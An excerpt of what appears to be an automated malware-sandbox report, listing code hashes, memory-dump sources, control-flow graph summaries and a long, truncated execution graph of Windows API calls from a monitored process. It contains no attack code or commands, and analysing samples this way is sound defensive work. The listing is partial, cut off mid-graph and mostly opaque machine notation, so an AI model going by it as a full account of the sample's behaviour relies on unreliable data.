• API String ID:
• Opcode ID: e90e7e2e724923c4c3215ef0cf0bb56b8834fac7198073354a1960af46dae333
• Instruction ID: 371faf2ebadcca8ad16299331dc2f6f163353655e7d42fdd3bfb511cec95f06a
• Opcode Fuzzy Hash: e90e7e2e724923c4c3215ef0cf0bb56b8834fac7198073354a1960af46dae333
• Instruction Fuzzy Hash: 50F15A2571CE488FC6A9A71D5845BBBB3D2E7AA314F58019FD04AC7397CD2C9C06839E

Control-flow Graph (graph rendering omitted; node listing not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e621a31e3968f1923c5a392cbe1e15984b311d240008ef38e05b1dbcaa09ae1e
• Instruction ID: b13c497299f946aa079adac70c4b8f9398f49dbdae51e28fe364947126b322f7
• Opcode Fuzzy Hash: e621a31e3968f1923c5a392cbe1e15984b311d240008ef38e05b1dbcaa09ae1e
• Instruction Fuzzy Hash: 0321B53020CF44CFDB699B18964877666E1AB77321F6841A79047CF39AD62CDC45932E

Control-flow Graph (graph rendering omitted; node listing not reproduced)
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 10e0d821a3f27bdcc91b59c4cd297bf2c0de565faee117d50b4f3b522f3ae712
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: 7F01D23010DF468FEB5556249F1837A7B90AB37335F2501ABC487CA199DB6C4A02E71F

Control-flow Graph (graph rendering omitted; node listing not reproduced)
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: 57bb9503ac938590158324a2601c14b03017ce0d62d7cd7c0eaec2068d7395d5
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: 37E0863060DB444FDB599B2459103193AE5FBAA321F1501CFC44AD72D5CB6D1E06879B

Control-flow Graph (graph rendering omitted; node listing not reproduced)
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 8e94e48f973075b9c3d4ec6308a445e85aa06e16b06886589236a1baba8d32d8
• Instruction ID: d24eec7d88b9027c1db6372d8c45e599d3f6b57bc1e515dcbfcc1af5edf1a993
• Opcode Fuzzy Hash: 8e94e48f973075b9c3d4ec6308a445e85aa06e16b06886589236a1baba8d32d8
• Instruction Fuzzy Hash: C001F2E160EE80CFD656A618530127B655AB77B324F28459B904ACF2A2C82C4D02938F

Control-flow Graph
(Rendered graph omitted; its legend marked each basic block as Executed or Not Executed.) Basic blocks span 4a8077-4a8335, entry at 4a8090. API calls in the graph: CloseHandle at 4a8186; GetTokenInformation at 4a80ca and 4a81fe. Internal calls to 4d715c, 4a5d90, 4aec00, 4d7164 and 4c1280.

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: aa79c47f8817bf1c0211969f4e1b0d704a2f0899b2a208951fff69cd6a09c941
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 09C08C7122A80A96527802880C0B0F22600E233358B0C000F8C0280320DD4C8E03209F

Control-flow Graph
(Rendered graph omitted; its legend marked each basic block as Executed or Not Executed.) Same block region as the graph above, 4a8077-4a8335, but with entry at 4a817f. API calls in the graph: CloseHandle at 4a8186; GetTokenInformation at 4a80ca and 4a81fe. Internal calls to 4d715c, 4a5d90, 4aec00, 4d7164 and 4c1280.

APIs
Memory Dump Source
• Source File: 0000000C.00000002.2675604019.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4a0000_alg.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: a10458964d86b8a0352008fec25544c7925d33f538bd2d4dbd5fbb17c9e9604b
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: 1BC092B155A50D87517827C82C0A0B33554D633768F0C841FEC169A3A2DD9C5D4365AF

Execution Graph

• Execution Coverage: 4%
• Dynamic/Decrypted Code Coverage: 0%
• Signature Coverage: 0%
• Total number of Nodes: 2000
• Total number of Limit Nodes: 11
(Rendered execution graph omitted; the node/edge listing is cut off mid-graph in the source.) API calls visible in the graph, grouped by the routines that issue them:
• Registry: RegOpenKeyExW (1b5e0f, 1b5b9e, 1b62dd, 1b6729, 1982bd, 1a09e8), RegEnumKeyExW (1b5990), RegQueryValueExW (1b62f3, 1b6332, 1ae9c5 and seven sites between 1982e1 and 1984fa), RegCreateKeyExW (1b67a4), RegSetValueExW (1b683c), RegDeleteValueW (1b689c)
• Token and thread: GetCurrentThreadId and OpenThread (1a09b1), NtOpenThreadToken (1a643a), RtlNtStatusToDosError and SetLastError (1b1ef3), GetCurrentThreadId (1b2f1d, 1b298e)
• Debugger and error handling: IsDebuggerPresent (1b2e5d), OutputDebugStringW (1b3036), FormatMessageW (1b290d, 1a640a), SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess (1a6b40), _CxxThrowException (1a77ec), _setjmp3 (1aea58, 19c5fe), longjmp (1a80ba, 1ad434, 1b89ce)
• Console: GetStdHandle, GetConsoleMode, SetConsoleMode, GetConsoleOutputCP, GetCPInfo, GetConsoleTitleW, SetConsoleTitleW, FlushConsoleInputBuffer, _getch, _setmode, _get_osfhandle, GetFileType, AcquireSRWLockShared and ReleaseSRWLockShared
• Process environment and locale: GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetModuleFileNameW, GetCurrentDirectoryW, GetModuleHandleW, GetProcAddress, SetThreadUILanguage, SetThreadLocale, GetThreadLocale, GetUserDefaultLCID, GetLocaleInfoW, GetDateFormatW, GetNumaHighestNodeNumber
• Memory and heap: HeapSetInformation, GetProcessHeap, HeapAlloc, RtlAllocateHeap, RtlFreeHeap, VirtualQuery, VirtualFree, LocalFree, malloc, realloc, _callnewh
• Time and CRT: GetSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, time, srand, rand, Sleep, _initterm, _amsg_exit, exit, memset, memcpy, memmove, wcsrchr, wcsstr, _wcsicmp, _wtol, wcstol, towupper, _vsnwprintf
calls 20279->20280 20280->20277 20281->18621 20282->20281 20283->20277 20300 1b87a0 20284->20300 20285 1b8900 20287 199950 448 API calls 20285->20287 20286 1b8930 20290 199950 448 API calls 20286->20290 20289 1b890f 20287->20289 20292 1b8925 20289->20292 20296 199950 448 API calls 20289->20296 20294 1b892e 20290->20294 20291 1b88be 20291->20285 20293 1b88c3 20291->20293 20872 1b871d 20292->20872 20293->20286 20298 1b88d2 20293->20298 20294->18625 20295 199950 448 API calls 20295->20300 20296->20292 20879 1b86e6 20298->20879 20299 1b8791 448 API calls 20299->20300 20300->20285 20300->20286 20300->20291 20300->20294 20300->20295 20300->20298 20300->20299 20310 19bb19 20301->20310 20313 19bac2 20301->20313 20302 19badc _wcsicmp 20303 19baf3 20302->20303 20305 19bb68 20302->20305 20306 19bb56 20303->20306 20399 19ccd0 20303->20399 20305->20303 20308 19cc70 548 API calls 20305->20308 20306->20263 20307 19bb15 20307->20263 20308->20305 20309 19cc70 548 API calls 20309->20310 20310->20309 20311 19bb48 20310->20311 20310->20313 20311->20306 20312 19cc70 548 API calls 20311->20312 20312->20313 20313->20302 20313->20303 20315 19d6b0 20314->20315 20316 1ad587 20315->20316 20318 19d6c6 EnterCriticalSection LeaveCriticalSection 20315->20318 20323 19d971 20315->20323 20317 1ad59b 20316->20317 20319 1963bd 448 API calls 20316->20319 20715 1b769e 20317->20715 20321 19d6f5 _get_osfhandle SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20318->20321 20322 1ad5a8 20318->20322 20319->20317 20326 19d752 20321->20326 20748 1b9fcf _get_osfhandle GetFileType 20322->20748 20323->20323 20693 19da30 20323->20693 20329 19d81c 20326->20329 20331 1ad742 memcmp 20326->20331 20338 19d774 20326->20338 20327 1ad5be 20330 1ad6bd 20327->20330 20334 19dd98 6 API calls 20327->20334 20328 19d980 20328->20265 20333 19d9f7 GetLastError 20329->20333 20343 19d82c 20329->20343 20330->20326 20332 1ad6c6 _get_osfhandle 20330->20332 20340 1ad6ef GetLastError 20330->20340 20330->20343 
20331->20338 20335 1b45f9 10 API calls 20332->20335 20333->20343 20336 1ad5cd 20334->20336 20335->20330 20336->20330 20337 1ad5de 20336->20337 20337->20321 20342 19dd98 6 API calls 20337->20342 20339 1ad78e AcquireSRWLockShared ReadFile ReleaseSRWLockShared 20338->20339 20341 19d7b2 20338->20341 20344 19d7bd SetFilePointer 20338->20344 20339->20341 20349 19d809 20339->20349 20340->20326 20340->20330 20346 1ad7e9 20341->20346 20347 19d7ec MultiByteToWideChar 20341->20347 20341->20349 20348 1ad5f2 20342->20348 20353 19dd98 6 API calls 20343->20353 20355 19d840 20343->20355 20344->20341 20350 1ad7f0 EnterCriticalSection LeaveCriticalSection longjmp 20346->20350 20347->20349 20351 1ad6b3 20348->20351 20354 1ad607 20348->20354 20349->20329 20349->20350 20350->20343 20351->20321 20352 19d893 20352->20265 20356 1ad826 20353->20356 20357 1ad61f EnterCriticalSection LeaveCriticalSection _get_osfhandle 20354->20357 20358 1ad610 20354->20358 20355->20352 20365 19d8f6 20355->20365 20366 19d8d7 wcschr 20355->20366 20356->20355 20361 1b9922 448 API calls 20356->20361 20360 1b4191 448 API calls 20357->20360 20749 1b7613 _get_osfhandle 20358->20749 20362 1ad665 20360->20362 20363 1ad84f longjmp 20361->20363 20362->20333 20364 1ad66d 20362->20364 20363->20355 20364->20343 20367 1ad677 GetLastError 20364->20367 20372 19d9e3 20365->20372 20375 19d904 20365->20375 20366->20355 20366->20365 20368 1ad689 20367->20368 20369 1ad69e 20367->20369 20370 199950 448 API calls 20368->20370 20371 199950 448 API calls 20369->20371 20374 1ad68e longjmp 20370->20374 20371->20343 20372->20323 20379 19d9eb 20372->20379 20373 1ad908 20373->20265 20374->20369 20375->20373 20377 19dd98 6 API calls 20375->20377 20376 1ad8d3 20381 1978e4 448 API calls 20376->20381 20380 19d945 20377->20380 20378 1ad8af 20384 1978e4 448 API calls 20378->20384 20379->20376 20379->20378 20383 1b769e 458 API calls 20379->20383 20380->20323 20385 19d949 _get_osfhandle SetFilePointer 20380->20385 20382 1ad8df 20381->20382 20386 
1ad8fb longjmp 20382->20386 20389 19dd98 6 API calls 20382->20389 20387 1ad898 20383->20387 20388 1ad8be 20384->20388 20385->20323 20396 1ad915 20385->20396 20386->20373 20390 199950 448 API calls 20387->20390 20391 1b9922 448 API calls 20388->20391 20392 1ad8f2 20389->20392 20393 1ad8a2 20390->20393 20394 1ad8c6 longjmp 20391->20394 20392->20386 20754 1ba0da 20392->20754 20395 199950 448 API calls 20393->20395 20394->20376 20395->20378 20396->20323 20398 19998d 448 API calls 20396->20398 20398->20323 20400 19cce9 20399->20400 20401 19cd14 20399->20401 20402 19cde8 20400->20402 20403 19ccf5 20400->20403 20442 19de30 20401->20442 20513 19e090 20402->20513 20405 19cd01 20403->20405 20406 19cdf2 20403->20406 20408 19cd12 20405->20408 20439 19e230 20405->20439 20516 19e210 20406->20516 20409 19cddd 20408->20409 20458 19cf10 _setjmp3 20408->20458 20409->20307 20413 19cd48 20414 19cd59 20413->20414 20415 1ad478 longjmp 20413->20415 20416 1ad48f 20414->20416 20424 19cd85 20414->20424 20415->20416 20417 199950 448 API calls 20416->20417 20418 1ad49f 20417->20418 20419 1b9922 448 API calls 20418->20419 20420 1ad4ac longjmp 20419->20420 20422 1ad4ba 20420->20422 20421 19ce4a 20427 19cc70 548 API calls 20421->20427 20431 19ce61 20421->20431 20434 19ce6c 20421->20434 20425 199950 448 API calls 20422->20425 20423 19cdd2 20426 19cf10 547 API calls 20423->20426 20424->20421 20424->20423 20429 1ad4ca 20425->20429 20426->20409 20427->20421 20428 19dcd0 448 API calls 20430 19ce89 20428->20430 20429->20307 20430->20418 20432 19ce93 20430->20432 20433 19cf10 547 API calls 20431->20433 20435 19cc70 548 API calls 20432->20435 20433->20434 20434->20409 20434->20428 20436 19ceac 20435->20436 20437 19bab0 574 API calls 20436->20437 20438 19cec6 20436->20438 20437->20438 20438->20307 20440 19ccd0 576 API calls 20439->20440 20441 19e247 20440->20441 20441->20408 20519 19ded0 20442->20519 20444 19de4a 20445 19de52 20444->20445 20446 1ada16 20444->20446 20537 19e0b0 20445->20537 20448 19cc70 
548 API calls 20446->20448 20451 19de57 20448->20451 20449 19de64 20450 19cc70 548 API calls 20449->20450 20456 19de92 20449->20456 20452 19de75 20450->20452 20451->20449 20454 1b8959 449 API calls 20451->20454 20453 19ded0 554 API calls 20452->20453 20455 19de80 20453->20455 20454->20449 20455->20456 20457 19cf10 547 API calls 20455->20457 20456->20408 20457->20456 20459 1ad56e 20458->20459 20464 19cf38 20458->20464 20460 19d03b 20461 19d048 20460->20461 20462 199950 448 API calls 20460->20462 20461->20413 20465 1ad4ca 20462->20465 20463 19cf9e 20467 19d600 532 API calls 20463->20467 20464->20459 20464->20460 20464->20463 20471 19cf86 wcschr 20464->20471 20501 19d0fa 20464->20501 20688 19d600 20464->20688 20465->20413 20469 19cfb7 20467->20469 20468 19cf67 iswspace 20468->20464 20470 1ad4d2 20469->20470 20474 19cfc7 20469->20474 20472 19d600 532 API calls 20470->20472 20470->20501 20471->20463 20471->20464 20473 1ad4ea 20472->20473 20482 19d600 532 API calls 20473->20482 20475 19cfe2 iswdigit 20474->20475 20477 19d0a6 20474->20477 20481 19d4a7 20474->20481 20474->20501 20476 19cfff 20475->20476 20503 19d341 20475->20503 20484 19d600 532 API calls 20476->20484 20494 19d027 20476->20494 20485 19d0e8 iswdigit 20477->20485 20486 19d0b5 iswspace 20477->20486 20477->20503 20478 19d218 20478->20413 20479 19d600 532 API calls 20479->20503 20480 19d190 20480->20478 20483 1978e4 448 API calls 20480->20483 20487 19d600 532 API calls 20481->20487 20482->20503 20483->20459 20490 19d2a5 20484->20490 20489 19d310 20485->20489 20485->20501 20486->20475 20488 19d0c7 20486->20488 20491 19d4ac 20487->20491 20493 19d0d0 wcschr 20488->20493 20488->20501 20492 19d328 iswspace 20489->20492 20489->20503 20499 19d600 532 API calls 20490->20499 20504 19d2ae 20490->20504 20491->20460 20491->20473 20491->20475 20491->20501 20495 19d484 20492->20495 20492->20503 20493->20475 20493->20485 20494->20413 20500 19a62f wcschr 20495->20500 20496 19d600 532 API calls 20496->20501 20497 19d16d 
iswdigit 20497->20501 20498 19d1b4 iswspace 20498->20480 20498->20501 20499->20504 20500->20503 20501->20476 20501->20480 20501->20496 20501->20497 20501->20498 20502 19d23e iswspace 20501->20502 20505 19d1d1 wcschr 20501->20505 20502->20501 20506 19d253 wcschr 20502->20506 20503->20475 20503->20479 20503->20501 20504->20494 20507 19d600 532 API calls 20504->20507 20509 19a62f wcschr 20504->20509 20510 19d426 iswdigit 20504->20510 20505->20480 20505->20497 20506->20501 20508 19d405 iswspace 20507->20508 20508->20504 20509->20504 20510->20494 20511 19d438 20510->20511 20512 19d600 532 API calls 20511->20512 20512->20494 20514 19ccd0 576 API calls 20513->20514 20515 19e0a7 20514->20515 20515->20408 20517 19ccd0 576 API calls 20516->20517 20518 19e227 20517->20518 20518->20408 20533 19df00 20519->20533 20520 19df16 iswdigit 20522 19df27 20520->20522 20520->20533 20521 19dcd0 448 API calls 20521->20533 20523 19df2f 20522->20523 20526 19cf10 547 API calls 20522->20526 20523->20444 20524 1adaf9 longjmp 20528 19e26b 20524->20528 20525 19df63 iswdigit 20525->20533 20526->20523 20527 1adaec 20529 1b8959 449 API calls 20527->20529 20528->20444 20530 1adaf1 20529->20530 20530->20524 20532 19e059 iswdigit 20532->20533 20533->20520 20533->20521 20533->20522 20533->20524 20533->20525 20533->20527 20533->20528 20533->20532 20534 1b8959 449 API calls 20533->20534 20535 19acb0 448 API calls 20533->20535 20536 19cc70 548 API calls 20533->20536 20611 19a931 20533->20611 20534->20533 20535->20533 20536->20533 20538 19e0c1 _wcsicmp 20537->20538 20539 19e15b 20537->20539 20540 19e0dc _wcsicmp 20538->20540 20541 19e203 _wcsicmp 20538->20541 20543 19dcd0 448 API calls 20539->20543 20544 19e1db 20539->20544 20540->20541 20545 19e0f7 _wcsicmp 20540->20545 20546 1a2a35 20541->20546 20594 1a2a63 20541->20594 20547 19e17d 20543->20547 20548 1b8959 449 API calls 20544->20548 20567 19e1e0 20544->20567 20545->20539 20549 19e112 _wcsicmp 20545->20549 20630 19bb90 20546->20630 20552 1a9ca7 
20547->20552 20566 19e187 20547->20566 20553 19e1f5 20548->20553 20549->20539 20550 19e12d _wcsicmp 20549->20550 20550->20539 20554 19e144 _wcsicmp 20550->20554 20557 1b9922 448 API calls 20552->20557 20553->20451 20554->20539 20555 1a2a47 20561 19cc70 548 API calls 20555->20561 20555->20594 20556 19e1bf 20560 19a8c4 562 API calls 20556->20560 20558 1a9cac longjmp 20557->20558 20559 195e22 20558->20559 20563 1a9cc3 20559->20563 20569 195da6 448 API calls 20559->20569 20564 19e1c9 20560->20564 20565 1a2a5b 20561->20565 20562 19cc70 548 API calls 20562->20566 20563->20451 20564->20567 20572 19cc70 548 API calls 20564->20572 20647 199907 20565->20647 20566->20556 20566->20562 20570 19e1b4 20566->20570 20567->20451 20573 195e31 20569->20573 20571 19cf10 547 API calls 20570->20571 20571->20556 20572->20544 20574 198f21 448 API calls 20573->20574 20577 195e3a 20574->20577 20575 1a2a7c _wcsicmp 20580 1a2a92 _wcsicmp 20575->20580 20575->20594 20576 1a2ae4 20578 1af500 20576->20578 20579 1a2af4 iswspace 20576->20579 20581 195e1d 20577->20581 20586 1b8c50 448 API calls 20577->20586 20583 1b8959 449 API calls 20578->20583 20579->20578 20582 1a2b0b 20579->20582 20584 1a2aa8 _wcsicmp 20580->20584 20580->20594 20581->20451 20588 19a62f wcschr 20582->20588 20589 1a2b81 20583->20589 20590 1a2abe _wcsicmp 20584->20590 20584->20594 20585 19dcd0 448 API calls 20585->20594 20600 195e68 20586->20600 20587 19cc70 548 API calls 20587->20594 20591 1a2b1f 20588->20591 20593 1b8959 449 API calls 20589->20593 20610 1a2b8c 20589->20610 20590->20594 20599 1a2ad7 20590->20599 20591->20578 20596 1a2b34 20591->20596 20592 1af4d2 20595 1b9922 448 API calls 20592->20595 20597 1af50f 20593->20597 20594->20575 20594->20576 20594->20585 20594->20587 20594->20592 20602 1b8959 449 API calls 20594->20602 20598 1af4d7 longjmp 20595->20598 20654 1a2c23 20596->20654 20597->20597 20598->20599 20599->20576 20604 1b8959 449 API calls 20599->20604 20600->20451 20602->20594 20603 1a2b4b 20658 1a33ca 20603->20658 
20604->20576 20610->20451 20612 19cc70 548 API calls 20611->20612 20613 19a93b 20612->20613 20614 19a942 20613->20614 20616 1b8959 449 API calls 20613->20616 20615 19dcd0 448 API calls 20614->20615 20617 19a94f 20614->20617 20615->20617 20616->20614 20618 19a959 20617->20618 20619 1b9922 448 API calls 20617->20619 20618->20533 20620 1a9cac longjmp 20619->20620 20621 195e22 20620->20621 20622 1a9cc3 20621->20622 20623 195da6 448 API calls 20621->20623 20622->20533 20624 195e31 20623->20624 20625 198f21 448 API calls 20624->20625 20626 195e3a 20625->20626 20627 195e1d 20626->20627 20628 1b8c50 448 API calls 20626->20628 20627->20533 20629 195e68 20628->20629 20629->20533 20631 19dcd0 448 API calls 20630->20631 20632 19bba1 20631->20632 20633 19dcd0 448 API calls 20632->20633 20638 19bbc1 20632->20638 20633->20638 20634 1b9922 448 API calls 20635 1a9cac longjmp 20634->20635 20636 195e22 20635->20636 20637 1a9cc3 20636->20637 20640 195da6 448 API calls 20636->20640 20637->20555 20638->20634 20639 19bbde 20638->20639 20639->20555 20641 195e31 20640->20641 20642 198f21 448 API calls 20641->20642 20643 195e3a 20642->20643 20644 195e1d 20643->20644 20645 1b8c50 448 API calls 20643->20645 20644->20555 20646 195e68 20645->20646 20646->20555 20648 19bc30 448 API calls 20647->20648 20649 199938 20648->20649 20678 19a800 20649->20678 20652 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20653 19994e 20652->20653 20653->20594 20655 19cc70 548 API calls 20654->20655 20656 1a2c2f _wcsicmp 20655->20656 20657 1a2c41 20656->20657 20657->20603 20659 19cc70 548 API calls 20658->20659 20660 1a33e2 20659->20660 20661 1af776 20660->20661 20671 1a33eb 20660->20671 20662 1b8959 449 API calls 20661->20662 20663 1af77b 20662->20663 20664 19cc70 548 API calls 20664->20671 20666 1a3457 20669 19dcd0 448 API calls 20669->20671 20670 19dd20 448 API calls 20670->20671 20671->20663 20671->20664 20671->20666 20671->20669 20671->20670 20672 1af78c 20671->20672 20673 1b9922 448 API calls 
20672->20673 20679 199943 20678->20679 20680 19a82f 20678->20680 20679->20652 20680->20679 20681 1b9a0e 449 API calls 20680->20681 20682 1ac971 20681->20682 20682->20679 20683 1963bd 448 API calls 20682->20683 20685 1ac982 20683->20685 20685->20679 20689 19d613 20688->20689 20690 19d660 532 API calls 20689->20690 20691 19d627 20689->20691 20692 1a80cd 20690->20692 20691->20468 20692->20468 20694 19dcd0 448 API calls 20693->20694 20695 19da45 20694->20695 20696 1ad948 memset longjmp 20695->20696 20697 19da52 20695->20697 20698 19da81 20696->20698 20697->20698 20699 19dad3 20697->20699 20700 1ad9ad 20697->20700 20712 1ad97b memcpy 20697->20712 20762 19ee03 20697->20762 20813 19bf70 20697->20813 20698->20328 20699->20700 20701 19daf1 20699->20701 20704 1978e4 448 API calls 20700->20704 20702 19dc60 2 API calls 20701->20702 20703 19daf6 20702->20703 20703->20328 20714 1ad9a8 20704->20714 20707 19dc60 2 API calls 20708 1ad9cc longjmp 20707->20708 20709 1ad9da 20708->20709 20710 1978e4 448 API calls 20709->20710 20711 1ad9e3 20710->20711 20711->20328 20713 1978e4 448 API calls 20712->20713 20713->20714 20714->20707 20716 1b7728 20715->20716 20717 1b76fd 20715->20717 20719 1b7d26 20716->20719 20722 1b7746 20716->20722 20724 199950 448 API calls 20716->20724 20718 1963bd 448 API calls 20717->20718 20721 1b7708 EnterCriticalSection LeaveCriticalSection 20718->20721 20720 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20719->20720 20723 1b7d3d 20720->20723 20721->20716 20725 19ec2e 448 API calls 20722->20725 20726 1b7750 20722->20726 20723->20322 20724->20722 20725->20726 20727 198e9e 448 API calls 20726->20727 20728 1b77ad 20727->20728 20867 1b7654 20728->20867 20731 1b7c99 20732 199abf _vsnwprintf 20731->20732 20733 1b7cba 20732->20733 20737 19998d 448 API calls 20733->20737 20734 1b78b8 towupper 20736 1b77fa 20734->20736 20735 199abf _vsnwprintf 20735->20736 20736->20733 20736->20734 20736->20735 20740 196854 448 API calls 20736->20740 20741 194d08 4 API 
calls 20736->20741 20742 199310 448 API calls 20736->20742 20743 1b7afc GetDriveTypeW 20736->20743 20745 1a72ef ApiSetQueryApiSetPresence 20736->20745 20746 199abf _vsnwprintf 20736->20746 20871 1a640a FormatMessageW 20736->20871 20738 1b7cfe 20737->20738 20738->20719 20739 1b7d07 EnterCriticalSection LeaveCriticalSection 20738->20739 20739->20719 20740->20736 20741->20736 20742->20736 20743->20736 20745->20736 20747 1b79ed LocalFree 20746->20747 20747->20736 20748->20327 20750 1b4799 448 API calls 20749->20750 20751 1b763c 20750->20751 20752 1b7649 GetLastError 20751->20752 20753 1b7645 20751->20753 20752->20753 20753->20343 20755 1ba0ef GetStdHandle 20754->20755 20756 1b4799 448 API calls 20755->20756 20757 1ba110 20756->20757 20758 1ba129 20757->20758 20759 1ba114 wcschr 20757->20759 20760 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20758->20760 20759->20755 20759->20758 20761 1ba133 20760->20761 20761->20386 20763 19ee4c 20762->20763 20764 19ee52 20762->20764 20763->20764 20765 19eea7 20763->20765 20766 19ee5a wcsrchr 20764->20766 20769 19ee68 20764->20769 20767 1ade31 20765->20767 20770 1a1a05 5 API calls 20765->20770 20766->20769 20767->20769 20772 1adf50 longjmp 20767->20772 20773 1ade49 ??_V@YAXPAX 20767->20773 20785 1adecb 20767->20785 20768 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20771 19ee88 20768->20771 20769->20768 20788 19eed8 20770->20788 20771->20697 20772->20767 20773->20769 20774 19ef50 wcsrchr 20778 19ef67 wcsrchr 20774->20778 20774->20788 20775 1ade80 wcschr 20779 1ade9e 20775->20779 20781 1adf01 20775->20781 20776 19ef09 towlower wcsrchr 20777 19f1dd wcsrchr 20776->20777 20776->20788 20780 19f1f7 towlower 20777->20780 20777->20788 20778->20781 20778->20788 20782 19dcd0 448 API calls 20779->20782 20780->20788 20781->20773 20783 1978e4 448 API calls 20781->20783 20786 1adeb5 20782->20786 20783->20767 20784 19acb0 448 API calls 20784->20788 20785->20773 20786->20767 20836 1a1d90 20786->20836 20787 19efef 
??_V@YAXPAX 20787->20769 20788->20767 20788->20773 20788->20774 20788->20775 20788->20776 20788->20781 20788->20784 20790 19efe6 20788->20790 20791 19f009 GetFullPathNameW 20788->20791 20795 1adf72 SearchPathW 20788->20795 20796 19efed 20788->20796 20797 1a0207 10 API calls 20788->20797 20799 1adfb9 wcsrchr 20788->20799 20800 19f067 memset 20788->20800 20802 1adff6 GetFileAttributesExW 20788->20802 20803 1ae07c FileTimeToSystemTime 20788->20803 20805 19f18a 20788->20805 20809 196854 448 API calls 20788->20809 20811 19f164 wcsrchr 20788->20811 20812 199310 448 API calls 20788->20812 20849 1bb325 20788->20849 20793 19acb0 448 API calls 20790->20793 20791->20788 20793->20796 20794 19dc60 2 API calls 20794->20781 20795->20788 20796->20769 20796->20787 20798 19f03d wcsrchr 20797->20798 20798->20788 20798->20799 20799->20788 20801 19e3f0 17 API calls 20800->20801 20801->20788 20802->20788 20803->20788 20804 19acb0 448 API calls 20806 19f1ba 20804->20806 20805->20804 20807 1ae271 20805->20807 20806->20796 20808 19f1c8 ??_V@YAXPAX 20806->20808 20808->20796 20809->20788 20811->20788 20811->20807 20812->20788 20814 19dcd0 448 API calls 20813->20814 20817 19bfc8 20814->20817 20815 1acfad longjmp 20824 19c02c 20815->20824 20816 1acfc1 longjmp 20816->20824 20818 19dcd0 448 API calls 20817->20818 20817->20824 20835 19c155 20817->20835 20818->20824 20819 19ec2e 448 API calls 20819->20824 20822 19c1ef wcstol 20822->20824 20823 19c111 20825 1ad029 20823->20825 20823->20835 20824->20815 20824->20816 20824->20819 20824->20822 20824->20823 20832 19c26d 20824->20832 20833 19c0bf 20824->20833 20824->20835 20828 1978e4 448 API calls 20825->20828 20826 1ad042 memcpy 20829 1ad063 20826->20829 20827 19c333 memcpy 20830 19c1b2 _wcsnicmp 20827->20830 20831 1ad036 longjmp 20828->20831 20830->20835 20831->20826 20834 19c27d wcstol 20832->20834 20832->20835 20862 19c3f4 20833->20862 20834->20835 20835->20826 20835->20827 20835->20830 20835->20833 20837 1a1da8 20836->20837 20838 1a1e5a 
